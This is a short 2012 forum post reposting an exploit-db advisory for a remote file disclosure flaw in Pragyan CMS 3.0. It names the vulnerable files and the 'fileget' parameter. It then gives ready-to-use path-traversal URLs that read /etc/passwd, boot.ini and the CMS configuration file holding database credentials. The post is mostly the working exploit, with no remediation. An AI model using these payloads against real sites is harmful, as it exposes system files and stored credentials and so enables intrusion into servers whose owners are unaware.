The_Arhitect Posted January 10, 2012 Report Posted January 10, 2012 Title Pragyan CMS v 3.0 => [Remote File Disclosure]Author Or4nG.M4nDownloadhttp://space.dl.sourceforge.net/project/pragyan/pragyan/3.0/PragyanCMS-v3.0-beta.tar.bz2vulndownload.lib.php line 16vulnindex.php line 234$_GET['fileget']exploit http://localhost/Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../ etc/passwd . boot.iniDownload Config fileexploit /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../appserv/www/Pragyan/cms/config.inc.phpexploit /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../home/exploitdb/public_html/Pragyan/cms/config.inc.phpsource: exploit-db.com Quote